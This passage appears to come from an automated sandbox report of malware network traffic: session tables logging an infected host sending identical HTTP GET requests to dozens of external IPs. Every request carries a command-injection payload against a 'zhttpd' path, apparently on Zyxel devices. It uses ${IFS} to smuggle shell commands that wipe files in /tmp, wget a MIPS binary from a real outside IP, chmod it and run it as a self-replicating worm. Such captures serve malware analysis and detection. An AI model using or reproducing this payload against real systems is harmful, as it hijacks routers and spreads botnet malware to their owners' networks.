                                          Jan 14, 2024 15:46:06.792756081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2069192.168.2.233691835.24.191.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792774916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2070192.168.2.2343726134.196.122.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792779922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2071192.168.2.235395645.227.173.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792829990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2072192.168.2.233348037.3.178.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792848110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2073192.168.2.235000495.122.66.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792860985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2074192.168.2.233899847.173.21.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792896032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2075192.168.2.2336964102.226.222.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792922020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2076192.168.2.235578690.121.144.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792938948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2077192.168.2.2340018153.29.188.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792963028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2078192.168.2.2346952130.90.110.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.792984962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2079192.168.2.2345826193.134.80.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793024063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2080192.168.2.234319045.138.201.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793034077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2081192.168.2.2356136145.172.113.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793071032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2082192.168.2.233820264.165.190.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793098927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2083192.168.2.2352950142.191.28.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793118954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2084192.168.2.234783472.86.12.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793129921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2085192.168.2.2350278203.10.90.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793169975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2086192.168.2.234012872.138.82.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793205023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2087192.168.2.2360500195.137.125.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793226957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2088192.168.2.2337048222.122.98.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793282032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2089192.168.2.2359334169.45.149.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793303013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2090192.168.2.233476623.98.229.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793354988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2091192.168.2.2342496119.59.78.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793370008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2092192.168.2.2350402208.108.123.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793411016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2093192.168.2.2352780152.8.137.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793437004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2094192.168.2.2346636132.12.228.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793467045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2095192.168.2.235258495.196.9.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793495893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2096192.168.2.233458080.14.163.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793525934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2097192.168.2.2351828117.1.140.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793567896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2098192.168.2.2341208119.126.214.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793595076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2099192.168.2.233894461.9.161.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793602943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2100192.168.2.2339068119.150.75.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793618917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2101192.168.2.235204883.3.185.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793673992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2102192.168.2.2346456185.21.99.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793740034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2103192.168.2.2360592138.160.235.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793756008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2104192.168.2.2337624110.116.173.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793776035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2105192.168.2.2336424170.223.194.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793818951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2106192.168.2.2346006207.246.24.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793843031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2107192.168.2.23375661.243.78.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793865919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2108192.168.2.2334114142.19.83.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793908119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2109192.168.2.233651836.173.31.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793934107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2110192.168.2.2345774184.86.169.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793939114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2111192.168.2.234453640.238.10.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.793998957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2112192.168.2.235654477.72.137.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794009924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2113192.168.2.235023890.133.41.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794035912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2114192.168.2.235350831.230.215.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794051886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2115192.168.2.234668423.92.218.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794071913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2116192.168.2.2359612198.24.93.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794111967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2117192.168.2.2357074128.6.220.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794143915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2118192.168.2.2341184102.228.107.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794166088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2119192.168.2.2341338176.212.41.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794178009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2120192.168.2.2350988130.231.19.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794205904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2121192.168.2.2342210166.240.198.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794399023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2122192.168.2.2355204121.97.173.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794409990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2123192.168.2.235331832.254.55.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794440031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2124192.168.2.234842882.65.75.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794455051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2125192.168.2.234125070.106.98.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794507027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2126192.168.2.233884043.30.178.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794532061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2127192.168.2.235416881.31.26.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794563055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2128192.168.2.2345828125.176.180.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794573069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2129192.168.2.234995853.81.185.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794591904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2130192.168.2.2334568144.196.48.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.794631004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2131192.168.2.235708690.127.216.87443
                                          TimestampBytes transferredDirectionData
